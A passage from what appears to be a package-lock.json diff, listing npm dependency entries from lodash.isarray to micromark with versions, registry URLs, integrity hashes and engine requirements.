"https://registry.npmjs.org/lodash.isarray/-/lodash.isarray-2.4.1.tgz", + "integrity": 
"sha1-tSoybB9i9tfac6MdVAHfbvRPD6E=", + "dependencies": { + "lodash._isnative": "~2.4.1" + } + }, + "node_modules/lodash.isboolean": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/lodash.isboolean/-/lodash.isboolean-3.0.3.tgz", + "integrity": "sha512-Bz5mupy2SVbPHURB98VAcw+aHh4vRV5IPNhILUCsOzRmsTmSQ17jIuqopAentWoehktxGd9e/hbIXq980/1QJg==" + }, + "node_modules/lodash.isequal": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/lodash.isequal/-/lodash.isequal-4.5.0.tgz", + "integrity": "sha1-QVxEePK8wwEgwizhDtMib30+GOA=" + }, + "node_modules/lodash.isfunction": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.isfunction/-/lodash.isfunction-2.4.1.tgz", + "integrity": "sha1-LP1XXHPkmKtX4xm3f6Aq3vE6lNE=" + }, + "node_modules/lodash.isinteger": { + "version": "4.0.4", + "resolved": "https://registry.npmjs.org/lodash.isinteger/-/lodash.isinteger-4.0.4.tgz", + "integrity": "sha512-DBwtEWN2caHQ9/imiNeEA5ys1JoRtRfY3d7V9wkqtbycnAmTvRRmbHKDV4a0EYc678/dia0jrte4tjYwVBaZUA==" + }, + "node_modules/lodash.isnumber": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/lodash.isnumber/-/lodash.isnumber-3.0.3.tgz", + "integrity": "sha512-QYqzpfwO3/CWf3XP+Z+tkQsfaLL/EnUlXWVkIk5FUPc4sBdTehEqZONuyRt2P67PXAk+NXmTBcc97zw9t1FQrw==" + }, + "node_modules/lodash.isobject": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.isobject/-/lodash.isobject-2.4.1.tgz", + "integrity": "sha1-Wi5H/mmVPx7mMafrof5k0tBlWPU=", + "dependencies": { + "lodash._objecttypes": "~2.4.1" + } + }, + "node_modules/lodash.isplainobject": { + "version": "4.0.6", + "resolved": "https://registry.npmjs.org/lodash.isplainobject/-/lodash.isplainobject-4.0.6.tgz", + "integrity": "sha1-fFJqUtibRcRcxpC4gWO+BJf1UMs=" + }, + "node_modules/lodash.isstring": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/lodash.isstring/-/lodash.isstring-4.0.1.tgz", + "integrity": "sha1-1SfftUVuynzJu5XV2ur4i6VKVFE=" + }, + "node_modules/lodash.keys": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.keys/-/lodash.keys-2.4.1.tgz", + "integrity": "sha1-SN6kbfj/djKxDXBrissmWR4rNyc=", + "dependencies": { + "lodash._isnative": "~2.4.1", + "lodash._shimkeys": "~2.4.1", + "lodash.isobject": "~2.4.1" + } + }, + "node_modules/lodash.memoize": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", + "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", + "dev": true + }, + "node_modules/lodash.merge": { + "version": "4.6.2", + "resolved": "https://registry.npmjs.org/lodash.merge/-/lodash.merge-4.6.2.tgz", + "integrity": "sha512-0KpjqXRVvrYyCsX1swR/XTK0va6VQkQM6MNo7PqW77ByjAhoARA8EfrP1N4+KlKj8YS0ZUCtRT/YUuhyYDujIQ==" + }, + "node_modules/lodash.noop": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.noop/-/lodash.noop-2.4.1.tgz", + "integrity": "sha1-T7VPgWZS5a4Q6PcvcXo4jHMmU4o=" + }, + "node_modules/lodash.once": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/lodash.once/-/lodash.once-4.1.1.tgz", + "integrity": "sha1-DdOXEhPHxW34gJd9UEyI+0cal6w=" + }, + "node_modules/lodash.support": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.support/-/lodash.support-2.4.1.tgz", + "integrity": "sha1-Mg4LZwMWc8KNeiu12eAzGkUkBRU=", + "dependencies": { + "lodash._isnative": "~2.4.1" + } + }, + "node_modules/lodash.truncate": { + "version": "4.4.2", + "resolved": 
"https://registry.npmjs.org/lodash.truncate/-/lodash.truncate-4.4.2.tgz", + "integrity": "sha512-jttmRe7bRse52OsWIMDLaXxWqRAmtIUccAQ3garviCqJjafXOfNMO0yMfNpdD6zbGaTU0P5Nz7e7gAT6cKmJRw==", + "dev": true + }, + "node_modules/lodash.union": { + "version": "4.6.0", + "resolved": "https://registry.npmjs.org/lodash.union/-/lodash.union-4.6.0.tgz", + "integrity": "sha1-SLtQiECfFvGCFmZkHETdGqrjzYg=" + }, + "node_modules/lodash.uniq": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/lodash.uniq/-/lodash.uniq-4.5.0.tgz", + "integrity": "sha512-xfBaXQd9ryd9dlSDvnvI0lvxfLJlYAZzXomUYzLKtUeOQvOP5piqAWuGtrhWeqaXK9hhoM/iyJc5AV+XfsX3HQ==", + "dev": true + }, + "node_modules/log": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/log/-/log-6.3.1.tgz", + "integrity": "sha512-McG47rJEWOkXTDioZzQNydAVvZNeEkSyLJ1VWkFwfW+o1knW+QSi8D1KjPn/TnctV+q99lkvJNe1f0E1IjfY2A==", + "dependencies": { + "d": "^1.0.1", + "duration": "^0.2.2", + "es5-ext": "^0.10.53", + "event-emitter": "^0.3.5", + "sprintf-kit": "^2.0.1", + "type": "^2.5.0", + "uni-global": "^1.0.0" + } + }, + "node_modules/log-symbols": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/log-symbols/-/log-symbols-4.1.0.tgz", + "integrity": "sha512-8XPvpAA8uyhfteu8pIvQxpJZ7SYYdpUivZpGy6sFsBuKRY/7rQGavedeB8aK+Zkyq6upMFVL/9AW6vOYzfRyLg==", + "dev": true, + "dependencies": { + "chalk": "^4.1.0", + "is-unicode-supported": "^0.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/log-symbols/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/log-symbols/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/log-symbols/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/log-update": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/log-update/-/log-update-4.0.0.tgz", + "integrity": "sha512-9fkkDevMefjg0mmzWFBW8YkFP91OrizzkW3diF7CpG+S2EYdy4+TVfGwz1zeF8x7hCx1ovSPTOE9Ngib74qqUg==", + "dev": true, + "dependencies": { + "ansi-escapes": "^4.3.0", + "cli-cursor": "^3.1.0", + "slice-ansi": "^4.0.0", + "wrap-ansi": "^6.2.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/log-update/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": 
"sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/log-update/node_modules/wrap-ansi": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-6.2.0.tgz", + "integrity": "sha512-r6lPcBGxZXlIcymEu7InxDMhdW0KDxpLgoFLcguasxCaJ/SOIZwINatK9KY/tf+ZrlywOKU0UDj3ATXUBfxJXA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.0.0", + "string-width": "^4.1.0", + "strip-ansi": "^6.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/loglevel": { + "version": "1.9.1", + "resolved": "https://registry.npmjs.org/loglevel/-/loglevel-1.9.1.tgz", + "integrity": "sha512-hP3I3kCrDIMuRwAwHltphhDM1r8i55H33GgqjXbrisuJhF4kRhW1dNuxsRklp4bXl8DSdLaNLuiL4A/LWRfxvg==", + "dev": true, + "engines": { + "node": ">= 0.6.0" + }, + "funding": { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/loglevel" + } + }, + "node_modules/long": { + "version": "5.2.3", + "resolved": "https://registry.npmjs.org/long/-/long-5.2.3.tgz", + "integrity": "sha512-lcHwpNoggQTObv5apGNCTdJrO69eHOZMi4BNC+rTLER8iHAqGrUVeLh/irVIM7zTw2bOXA8T6uNPeujwOLg/2Q==" + }, + "node_modules/loose-envify": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/loose-envify/-/loose-envify-1.4.0.tgz", + "integrity": "sha512-lyuxPGr/Wfhrlem2CL/UcnUc1zcqKAImBDzukY7Y5F/yQiNdko6+fRLevlw1HgMySw7f611UIY408EtxRSoK3Q==", + "dependencies": { + "js-tokens": "^3.0.0 || ^4.0.0" + }, + "bin": { + "loose-envify": "cli.js" + } + }, + "node_modules/loupe": { + "version": "2.3.7", + "resolved": "https://registry.npmjs.org/loupe/-/loupe-2.3.7.tgz", + "integrity": "sha512-zSMINGVYkdpYSOBmLi0D1Uo7JU9nVdQKrHxC8eYlV+9YKK9WePqAlL7lSlorG/U2Fw1w0hTBmaa/jrQ3UbPHtA==", + "dev": true, + "dependencies": { + "get-func-name": "^2.0.1" + } + }, + "node_modules/lower-case": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/lower-case/-/lower-case-2.0.2.tgz", + "integrity": "sha512-7fm3l3NAF9WfN6W3JOmf5drwpVqX78JtoGJ3A6W0a6ZnldM41w2fV5D490psKFTpMds8TJse/eHLFFsNHHjHgg==", + "dev": true, + "dependencies": { + "tslib": "^2.0.3" + } + }, + "node_modules/lru-cache": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", + "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", + "dependencies": { + "yallist": "^3.0.2" + } + }, + "node_modules/lru-cache-for-clusters-as-promised": { + "version": "1.7.4", + "resolved": "https://registry.npmjs.org/lru-cache-for-clusters-as-promised/-/lru-cache-for-clusters-as-promised-1.7.4.tgz", + "integrity": "sha512-7A+O3nSLQZua1Et9MTuKP7Tl7Zo2L5OucBafTsmAXHQ7M9whxforWoM2RsX25sP3HmaVwF7D7Eg64o6iqAuZkw==", + "dependencies": { + "cron": "1.8.2", + "debug": "4.3.3", + "lru-cache": "6.0.0", + "uuid": "8.3.2" + } + }, + "node_modules/lru-cache-for-clusters-as-promised/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/lru-cache-for-clusters-as-promised/node_modules/uuid": { + "version": "8.3.2", + "resolved": 
"https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/lru-cache-for-clusters-as-promised/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/lru-queue": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/lru-queue/-/lru-queue-0.1.0.tgz", + "integrity": "sha512-BpdYkt9EvGl8OfWHDQPISVpcl5xZthb+XPsbELj5AQXxIC8IriDZIQYjBJPEm5rS420sjZ0TLEzRcq5KdBhYrQ==", + "dev": true, + "dependencies": { + "es5-ext": "~0.10.2" + } + }, + "node_modules/luxon": { + "version": "3.5.0", + "resolved": "https://registry.npmjs.org/luxon/-/luxon-3.5.0.tgz", + "integrity": "sha512-rh+Zjr6DNfUYR3bPwJEnuwDdqMbxZW7LOQfUN4B54+Cl+0o5zaU9RJ6bcidfDtC1cWCZXQ+nvX8bf6bAji37QQ==", + "license": "MIT", + "engines": { + "node": ">=12" + } + }, + "node_modules/lz-string": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/lz-string/-/lz-string-1.5.0.tgz", + "integrity": "sha512-h5bgJWpxJNswbU7qCrV0tIKQCaS3blPDrqKWx+QxzuzL1zGUzij9XCWLrSLsJPu5t+eWA/ycetzYAO5IOMcWAQ==", + "dev": true, + "bin": { + "lz-string": "bin/bin.js" + } + }, + "node_modules/magic-string": { + "version": "0.30.17", + "resolved": "https://registry.npmjs.org/magic-string/-/magic-string-0.30.17.tgz", + "integrity": "sha512-sNPKHvyjVf7gyjwS4xGTaW/mCnF8wnjtifKBEhxfZ7E/S8tQ0rssrwGNn6q8JH/ohItJfSQp9mBtQYuTlH5QnA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@jridgewell/sourcemap-codec": "^1.5.0" + } + }, + "node_modules/mailtrap": { + "version": "3.4.0", + "resolved": "https://registry.npmjs.org/mailtrap/-/mailtrap-3.4.0.tgz", + "integrity": "sha512-gegg90/gMY8hvfxB+WMtE8RRZyhQr90jUw00QOLApIAomItumqFBCpZv5IfG51EUKThu9+p7X4QdNA4buryenw==", + "dev": true, + "license": "MIT", + "dependencies": { + "axios": ">=0.27" + }, + "engines": { + "node": ">=16.20.1", + "yarn": ">=1.22.17" + }, + "peerDependencies": { + "@types/nodemailer": "^6.4.9", + "nodemailer": "^6.9.4" + }, + "peerDependenciesMeta": { + "@types/nodemailer": { + "optional": true + }, + "nodemailer": { + "optional": true + } + } + }, + "node_modules/make-dir": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-2.1.0.tgz", + "integrity": "sha512-LS9X+dc8KLxXCb8dni79fLIIUA5VyZoyjSMCwTluaXA0o27cCK0bhXkpgw+sTXVpPy/lSO57ilRixqk0vDmtRA==", + "dev": true, + "dependencies": { + "pify": "^4.0.1", + "semver": "^5.6.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/make-dir/node_modules/pify": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/pify/-/pify-4.0.1.tgz", + "integrity": "sha512-uB80kBFb/tfd68bVleG9T5GGsGPjJrLAUpR5PZIrhBnIaRTQRjqdJSsIKkOP6OAIFbj7GOrcudc5pNjZ+geV2g==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/make-dir/node_modules/semver": { + "version": "5.7.2", + "resolved": "https://registry.npmjs.org/semver/-/semver-5.7.2.tgz", + "integrity": "sha512-cBznnQ9KjJqU67B52RMC65CMarK2600WFnbkcaiwWq3xy/5haFJlshgnpjovMVJ+Hff49d8GEn0b87C5pDQ10g==", + "dev": true, + "bin": { + "semver": "bin/semver" + } + }, + "node_modules/map-cache": { + "version": "0.2.2", + "resolved": "https://registry.npmjs.org/map-cache/-/map-cache-0.2.2.tgz", + "integrity": 
"sha512-8y/eV9QQZCiyn1SprXSrCmqJN0yNRATe+PO8ztwqrvrbdRLA3eYJF0yaR0YayLWkMbsQSKWS9N2gPcGEc4UsZg==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/map-obj": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/map-obj/-/map-obj-2.0.0.tgz", + "integrity": "sha1-plzSkIepJZi4eRJXpSPgISIqwfk=", + "engines": { + "node": ">=4" + } + }, + "node_modules/map-or-similar": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/map-or-similar/-/map-or-similar-1.5.0.tgz", + "integrity": "sha512-0aF7ZmVon1igznGI4VS30yugpduQW3y3GkcgGJOp7d8x8QrizhigUxjI/m2UojsXXto+jLAH3KSz+xOJTiORjg==", + "dev": true, + "license": "MIT" + }, + "node_modules/map-visit": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/map-visit/-/map-visit-1.0.0.tgz", + "integrity": "sha512-4y7uGv8bd2WdM9vpQsiQNo41Ln1NvhvDRuVt0k2JZQ+ezN2uaQes7lZeZ+QQUHOLQAtDaBJ+7wCbi+ab/KFs+w==", + "dev": true, + "dependencies": { + "object-visit": "^1.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/markdown-it": { + "version": "14.1.0", + "resolved": "https://registry.npmjs.org/markdown-it/-/markdown-it-14.1.0.tgz", + "integrity": "sha512-a54IwgWPaeBCAAsv13YgmALOF1elABB08FxO9i+r4VFk5Vl4pKokRPeX8u5TCgSsPi6ec1otfLjdOpVcgbpshg==", + "dependencies": { + "argparse": "^2.0.1", + "entities": "^4.4.0", + "linkify-it": "^5.0.0", + "mdurl": "^2.0.0", + "punycode.js": "^2.3.1", + "uc.micro": "^2.1.0" + }, + "bin": { + "markdown-it": "bin/markdown-it.mjs" + } + }, + "node_modules/markdown-it-anchor": { + "version": "8.6.7", + "resolved": "https://registry.npmjs.org/markdown-it-anchor/-/markdown-it-anchor-8.6.7.tgz", + "integrity": "sha512-FlCHFwNnutLgVTflOYHPW2pPcl2AACqVzExlkGQNsi4CJgqOHN7YTgDd4LuhgN1BFO3TS0vLAruV1Td6dwWPJA==", + "peerDependencies": { + "@types/markdown-it": "*", + "markdown-it": "*" + } + }, + "node_modules/markdown-it/node_modules/entities": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/entities/-/entities-4.5.0.tgz", + "integrity": "sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw==", + "engines": { + "node": ">=0.12" + }, + "funding": { + "url": "https://github.com/fb55/entities?sponsor=1" + } + }, + "node_modules/markdown-it/node_modules/uc.micro": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/uc.micro/-/uc.micro-2.1.0.tgz", + "integrity": "sha512-ARDJmphmdvUk6Glw7y9DQ2bFkKBHwQHLi2lsaH6PPmz/Ka9sFOBsBluozhDltWmnv9u/cF6Rt87znRTPV+yp/A==" + }, + "node_modules/marked": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/marked/-/marked-4.1.0.tgz", + "integrity": "sha512-+Z6KDjSPa6/723PQYyc1axYZpYYpDnECDaU6hkaf5gqBieBkMKYReL5hteF2QizhlMbgbo8umXl/clZ67+GlsA==", + "bin": { + "marked": "bin/marked.js" + }, + "engines": { + "node": ">= 12" + } + }, + "node_modules/match-sorter": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/match-sorter/-/match-sorter-6.3.1.tgz", + "integrity": "sha512-mxybbo3pPNuA+ZuCUhm5bwNkXrJTbsk5VWbR5wiwz/GC6LIiegBGn2w3O08UG/jdbYLinw51fSQ5xNU1U3MgBw==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.12.5", + "remove-accents": "0.4.2" + } + }, + "node_modules/matchmediaquery": { + "version": "0.4.2", + "resolved": "https://registry.npmjs.org/matchmediaquery/-/matchmediaquery-0.4.2.tgz", + "integrity": "sha512-wrZpoT50ehYOudhDjt/YvUJc6eUzcdFPdmbizfgvswCKNHD1/OBOHYJpHie+HXpu6bSkEGieFMYk6VuutaiRfA==", + "dependencies": { + "css-mediaquery": "^0.1.2" + } + }, + "node_modules/material-colors": { + "version": "1.2.6", + 
"resolved": "https://registry.npmjs.org/material-colors/-/material-colors-1.2.6.tgz", + "integrity": "sha512-6qE4B9deFBIa9YSpOc9O0Sgc43zTeVYbgDT5veRKSlB2+ZuHNoVVxA1L/ckMUayV9Ay9y7Z/SZCLcGteW9i7bg==", + "dev": true + }, + "node_modules/mathjax": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/mathjax/-/mathjax-3.2.2.tgz", + "integrity": "sha512-Bt+SSVU8eBG27zChVewOicYs7Xsdt40qm4+UpHyX7k0/O9NliPc+x77k1/FEsPsjKPZGJvtRZM1vO+geW0OhGw==", + "dev": true + }, + "node_modules/mathml-tag-names": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/mathml-tag-names/-/mathml-tag-names-2.1.3.tgz", + "integrity": "sha512-APMBEanjybaPzUrfqU0IMU5I0AswKMH7k8OTLs0vvV4KZpExkTkY87nR/zpbuTPj+gARop7aGUbl11pnDfW6xg==", + "dev": true, + "peer": true, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/wooorm" + } + }, + "node_modules/maxmind": { + "version": "4.3.6", + "resolved": "https://registry.npmjs.org/maxmind/-/maxmind-4.3.6.tgz", + "integrity": "sha512-CwnEZqJX0T6b2rWrc0/V3n9hL/hWAMEn7fY09077YJUHiHx7cn/esA2ZIz8BpYLSJUf7cGVel0oUJa9jMwyQpg==", + "dependencies": { + "mmdb-lib": "2.0.2", + "tiny-lru": "8.0.2" + }, + "engines": { + "node": ">=10", + "npm": ">=6" + } + }, + "node_modules/mdn-data": { + "version": "2.0.30", + "resolved": "https://registry.npmjs.org/mdn-data/-/mdn-data-2.0.30.tgz", + "integrity": "sha512-GaqWWShW4kv/G9IEucWScBx9G1/vsFZZJUO+tD26M8J8z3Kw5RDQjaoZe03YAClgeS/SWPOcb4nkFBTEi5DUEA==", + "dev": true + }, + "node_modules/mdurl": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/mdurl/-/mdurl-2.0.0.tgz", + "integrity": "sha512-Lf+9+2r+Tdp5wXDXC4PcIBjTDtq4UKjCPMQhKIuzpJNW0b96kVqSwW0bT7FhRSfmAiFYgP+SCRvdrDozfh0U5w==" + }, + "node_modules/media-typer": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz", + "integrity": "sha1-hxDXrwqmJvj/+hzgAWhUUmMlV0g=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/memfs": { + "version": "3.5.1", + "resolved": "https://registry.npmjs.org/memfs/-/memfs-3.5.1.tgz", + "integrity": "sha512-UWbFJKvj5k+nETdteFndTpYxdeTMox/ULeqX5k/dpaQJCCFmj5EeKv3dBcyO2xmkRAx2vppRu5dVG7SOtsGOzA==", + "dev": true, + "dependencies": { + "fs-monkey": "^1.0.3" + }, + "engines": { + "node": ">= 4.0.0" + } + }, + "node_modules/memoizee": { + "version": "0.4.15", + "resolved": "https://registry.npmjs.org/memoizee/-/memoizee-0.4.15.tgz", + "integrity": "sha512-UBWmJpLZd5STPm7PMUlOw/TSy972M+z8gcyQ5veOnSDRREz/0bmpyTfKt3/51DhEBqCZQn1udM/5flcSPYhkdQ==", + "dev": true, + "dependencies": { + "d": "^1.0.1", + "es5-ext": "^0.10.53", + "es6-weak-map": "^2.0.3", + "event-emitter": "^0.3.5", + "is-promise": "^2.2.2", + "lru-queue": "^0.1.0", + "next-tick": "^1.1.0", + "timers-ext": "^0.1.7" + } + }, + "node_modules/memoizerific": { + "version": "1.11.3", + "resolved": "https://registry.npmjs.org/memoizerific/-/memoizerific-1.11.3.tgz", + "integrity": "sha512-/EuHYwAPdLtXwAwSZkh/Gutery6pD2KYd44oQLhAvQp/50mpyduZh8Q7PYHXTCJ+wuXxt7oij2LXyIJOOYFPog==", + "dev": true, + "license": "MIT", + "dependencies": { + "map-or-similar": "^1.5.0" + } + }, + "node_modules/memory-pager": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/memory-pager/-/memory-pager-1.5.0.tgz", + "integrity": "sha512-ZS4Bp4r/Zoeq6+NLJpP+0Zzm0pR8whtGPf1XExKLJBAczGMnSi3It14OiNCStjQjM6NU1okjQGSxgEZN8eBYKg==" + }, + "node_modules/mensch": { + "version": "0.3.4", + "resolved": "https://registry.npmjs.org/mensch/-/mensch-0.3.4.tgz", + "integrity": 
"sha512-IAeFvcOnV9V0Yk+bFhYR07O3yNina9ANIN5MoXBKYJ/RLYPurd2d0yw14MDhpr9/momp0WofT1bPUh3hkzdi/g==", + "dev": true + }, + "node_modules/meow": { + "version": "13.2.0", + "resolved": "https://registry.npmjs.org/meow/-/meow-13.2.0.tgz", + "integrity": "sha512-pxQJQzB6djGPXh08dacEloMFopsOqGVRKFPYvPOt9XDZ1HasbgDZA74CJGreSU4G3Ak7EFJGoiH2auq+yXISgA==", + "dev": true, + "peer": true, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/merge-descriptors": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/merge-descriptors/-/merge-descriptors-1.0.3.tgz", + "integrity": "sha512-gaNvAS7TZ897/rVaZ0nMtAyxNyi/pdbjbAwUpFQpN70GqnVfOiXpeUUMKRBmzXaSQ8DdTX4/0ms62r2K+hE6mQ==", + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/merge-stream": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", + "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", + "dev": true + }, + "node_modules/merge2": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/merge2/-/merge2-1.4.1.tgz", + "integrity": "sha512-8q7VEgMJW4J8tcfVPy8g09NcQwZdbwFEqhe/WZkoIzjn/3TGDwtOCYtXGxA3O8tPzpczCCDgv+P2P5y00ZJOOg==", + "dev": true, + "engines": { + "node": ">= 8" + } + }, + "node_modules/method-override": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/method-override/-/method-override-3.0.0.tgz", + "integrity": "sha512-IJ2NNN/mSl9w3kzWB92rcdHpz+HjkxhDJWNDBqSlas+zQdP8wBiJzITPg08M/k2uVvMow7Sk41atndNtt/PHSA==", + "dependencies": { + "debug": "3.1.0", + "methods": "~1.1.2", + "parseurl": "~1.3.2", + "vary": "~1.1.2" + }, + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/method-override/node_modules/debug": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.1.0.tgz", + "integrity": "sha512-OX8XqP7/1a9cqkxYw2yXss15f26NKWBpDXQd0/uK/KPqdQhxbPa994hnzjcE2VqQpDslf55723cKPUOGSmMY3g==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/method-override/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g=" + }, + "node_modules/methods": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/methods/-/methods-1.1.2.tgz", + "integrity": "sha1-VSmk1nZUE07cxSZmVoNbD4Ua/O4=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/mhook": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/mhook/-/mhook-1.0.1.tgz", + "integrity": "sha1-C6igyiARIlgzA9tKsdDi/5jytUw=" + }, + "node_modules/micromark": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/micromark/-/micromark-4.0.0.tgz", + "integrity": "sha512-o/sd0nMof8kYff+TqcDx3VSrgBTcZpSvYcAHIfHhv5VAuNmisCxjhx6YmxS8PFEpb9z5WKWKPdzf0jM23ro3RQ==", + "dev": true, + "funding": [ + { + "type": "GitHub Sponsors", + "url": "https://github.com/sponsors/unifiedjs" + }, + { + "type": "OpenCollective", + "url": "https://opencollective.com/unified" + } + ], + "dependencies": { + "@types/debug": "^4.0.0", + "debug": "^4.0.0", + "decode-named-character-reference": "^1.0.0", + "devlop": "^1.0.0", + "micromark-core-commonmark": "^2.0.0", + "micromark-factory-space": "^2.0.0", + "micromark-util-character": 